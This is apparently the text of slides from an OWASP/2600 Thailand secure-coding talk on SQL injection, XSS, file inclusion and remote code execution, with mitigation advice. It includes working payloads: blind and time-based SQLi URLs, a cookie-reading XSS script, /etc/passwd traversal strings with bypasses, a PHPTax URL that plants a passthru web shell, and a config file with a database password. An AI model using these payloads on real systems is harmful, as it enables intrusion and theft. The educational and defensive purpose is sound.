OWASP and 2600 Thailand

1. Hack and Slash : Secure Coding
Krit Kadnok
Prathan Phongthiproek

2. The Most Common Vulnerabilities
 SQL Injection
 Cross Site Scripting (XSS)
 File Inclusion
 Remote Code Execution

3. SQL Injection
 SQL Injection
 Blind SQL Injection

4. SQL Injection (Cont.)
If user enters ‘ UNION SELECT ALL user(), database() #

5. Blind SQL Injection
 Normal Blind - Where you get TRUE/FALSE responses
based on output of SQL query. This is visible change
in page.
 Totally Blind - No change in output for TRUE/FALSE
condition.

6. Normal Blind
Vulnerable URL:
http://site/vulnerabilities/sqli_blind/?id=1
TRUE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1
FALSE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2
Check Version:
FALSE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4
TRUE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5

7. Totally Blind
As this type didn't have any TRUE/FALSE responses, we need to use
time-based injection. Use IF() for condition and BENCHMARK() for
time delay.
Check Version:
FALSE Response
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT
IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),null
TRUE Response
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT
IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),null
Table name guessing:
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 from
users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

8. Blind SQL Injection

9. Case Study
PHD Helpdesk 2.12 SQLi Vulnerability (login.php)

10. Case Study
PHD Helpdesk 2.12 SQLi Vulnerability
Submit POST data to login.php
 Result

11. Mitigation/Prevention
 Use of Prepared Statements (Parameterized Queries)
 Use of Stored Procedures
 Escaping all User Supplied Input
 Least Privilege
 White List Input Validation
 https://www.owasp.org/index.php/SQL_Injection_Prev
ention_Cheat_Sheet

12. Cross Site Scripting (XSS)
 XSS Reflected
 XSS Stored

13. XSS Reflected
 <script>alert(document.cookie)</script>

14. XSS Stored
 <script>alert(document.cookie)</script>

15. Mitigation/Prevention
 Escape Before Inserting Untrusted Data into HTML
Context
 Positive or “whitelist” input validation is also
recommended
 Use HTTPOnly cookie flag
 https://www.owasp.org/index.php/XSS_(Cross_Site_S
cripting)_Prevention_Cheat_Sheet

16. File Inclusion
 Include PHP Shell (RFI)
 Directory Traversal (LFI)
 Read Code via PHP Stream Filters (PHP://filter)
 Remote Code Execution (LFI to RCE)
 Etc

17. File Inclusion (RFI)
RFI not Work !!
Allow_url_include is disable

18. File Inclusion (LFI)
LFI Work !!

19. File Inclusion (PHP Stream)
It’s Work !!
Allow_url_include is disable

20. File Inclusion (PHP Stream)
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = “mYDb@dm1n;
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc;
*.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf;
*.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";}
?>

21. File Inclusion (LFI to RCE)

22. File Inclusion (Bypass)
 Bad Code
 Bypass it !!
 Null Byte ?page=../../../../../../../../../../../etc/passwd%00
 Path Truncation ?page=../../../../../../../../../../../etc/passwd.............
 Dot Truncation ?page =../../../../../../../../../../../etc/passwd…………….....

23. Case Study
 DevalCMS 1.4a (currentfile) LFI Vulnerability

24. Case Study
 DevalCMS 1.4a (currentfile) LFI Vulnerability

25. Mitigation/Prevention
 Whitelist

26. Remote Code Execution
 Dangerous Function
 exec
 system
 passthru
 shell_exec
 proc_open
 pcntl_exec
 popen
 eval
 assert
 escapeshellcmd
 preg_replace
 call_user_func
 call_user_func_array
 Etc

27. Remote Code Execution

28. Remote Code Execution

29. Remote Code Execution (Bypass)
 PHPTax Remote Code Execution
http://localhost/phptax/index.php?newvalue=%3C?php%20
passthru%28$_GET[cmd]%29;?%3E&field=rce.php

30. Remote Code Execution

31. Remote Code Execution
 PHP-Charts 1.0 (type) RCE Vulnerability

32. Remote Code Execution
 PHP-Charts 1.0 (type) RCE Vulnerability

33. Mitigation/Prevention
 Ensure that user input is properly validated
 Limit the use of dynamic inputs from users to
vulnerable functions
 Build a whitelist for positive file names and code with
regular expressions (e.g. Alphanumeric only) or
arrays.
 Do not try to blacklist for evil PHP code

34. Bug Hunting !!
 Code Review
 Scan for potential vulnerable functions
 Traces back its parameter
 Free Tool !! >> http://sourceforge.net/projects/rips-
scanner/

35. RIPS

36. Visit => http://www.owasp.org

37. References
 http://www.websec.ca/kb/sql_injection
 https://www.owasp.org/index.php/SQL_Injection
 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
 https://www.owasp.org/index.php/PHP_File_Inclusion
 https://www.owasp.org/index.php/Top_10_2007-
Malicious_File_Execution
 http://www.exploit-db.com
 http://sourceforge.net/projects/rips-scanner

38. If someone is still in the room..
THANK YOU